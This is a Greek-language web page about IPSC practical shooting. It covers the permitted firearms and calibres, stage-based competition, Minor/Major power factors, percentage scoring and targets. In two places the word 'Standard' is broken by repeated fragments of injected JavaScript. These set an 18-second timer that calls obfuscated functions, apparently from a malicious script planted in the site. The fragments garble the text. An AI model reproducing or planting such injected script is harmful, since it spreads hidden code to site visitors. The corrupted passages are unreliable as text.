Πρακτική Σκοποβολή (IPSC)

Το αγώνισμα της σκοποβολής IPSC διεξάγεται με πιστόλια και περίστροφα διαμετρήματος 9 mm και πάνω, τουφέκια ραβδωτά αλλά και λειόκανα τουφέκια με διαμέτρημα τουλάχιστον 20GA.

Εδώ ο σκοπευτής βγαίνει απο τον κλειστό χώρο της «σκοπευτικής θυρίδας» και περνά στον ανοιχτό σκοπευτικό στίβο. Απαιτεί απο τον σκοπευτή ευθυβολία, ταχύτητα, καλή σωματική κατάσταση και γρήγορη αντίληψη του σκοπευτικού σταδίου που εκτελεί. Σε αυτό το είδος σκοποβολής ο σκοπευτής καλείται να εκτελέσει εναν αριθμό διαφορετικών σκοπευτικών σεναρίων με την μέγιστη ευθυβολία στον ελάχιστο χρόνο.

Αν και τα σκοπευτικά σενάρια δεν είναι απο αγώνα σε αγώνα τα ίδια, η γενική ιδέα είναι να βάλλεις τους στόχους (που θα σου υποδείξει ο κριτής πριν την βολή) στο ελάχιστο χρόνο, χωρίς να βάλλεις στην προσπάθεια σου μη βαλλόμενους (“No shoot”) στόχους (εάν υπάρχουν στο σενάριο) ακολουθώντας τους όρους του σεναρίου. Ενας αγώνας αποτελείται απο αριθμό σταδίων ανάλογα με την κατηγορία του. Χρησιμοποιούνται κυρίως πιστόλια με ελάχιστο διαμέτρημα των 9χιλ. αλλά και τουφέκια (ραβδωτά και λειόκαννα).
Οι κατηγορίες του αγωνίσματος ορίζονται απο το είδος του όπλου που χρησιμοποιείται σε standom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andard, modified & open. Επιπλέον ανάλογα με την ενέργεια της βολίδας του όπλου που χρησιμοποιεί ο σκοπευτής υπάρχουν δύο βαθμολογίες: η Minor και η Major. Η ενέργεια της βολίδας ορίζεται απο το βάρος και την ταχύτητα της.

Η βαθμολογία του σκοπευτή εκφράζεται σε ποσοστό τοις εκατό έχοντας τον πρώτο σκοπευτή του αγώνα με αποτέλεσμα 100%. Είναι αυτονόητο ότι δεν μπορεί να υπάρξει συγκριτικό μεταξύ δύο αγώνων παρά μόνον εάν τα σενάρια των σταδίων είναι απόλυτα ίδια. O στόχοι που χρησιμοποιούνται είναι ο Standom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andard IPSC, τα Pepper Poppers (μεταλλικοί στόχοι που όταν βληθούν εύστοχα πέφτουν) και σε λίγο οι πιό νέοι στόχοι που επιβάλλει η IPSC.

Οι κανόνες της Πρακτικής Σκοποβολής είναι ιδιαίτερα πολύπλοκοι για το τι επιτρέπεται και τι απαγορεύεται. Γενικά οι κανόνες έχουν φτιαχτεί έτσι ώστε να βοηθούν τον σκοπευτή και να εγγυώνται το μέγιστο της ασφάλειας. Για περισσότερες πληροφορίες, αλλά και για τον πλήρη κανονισμό της Πρακτικής Σκοποβολής μπορείτε να επισκεφθείτε το site της IPSC.

Η Πρακτική Σκοποβολή έχει ραγδαία εξέλιξη στην Ελλάδα με πολλούς νέους σκοπευτές. Ο συνδυασμός της γρήγορης βολής με την χρήση μεγάλων διαμετρημάτων προσελκύει δικαιολογημένα τον περισσότερο κόσμο που θέλει να ασχοληθεί με την σκοποβολή, μια και προσφέρει περισσότερη δράση και θέαμα από τον Σταθερό Στόχο.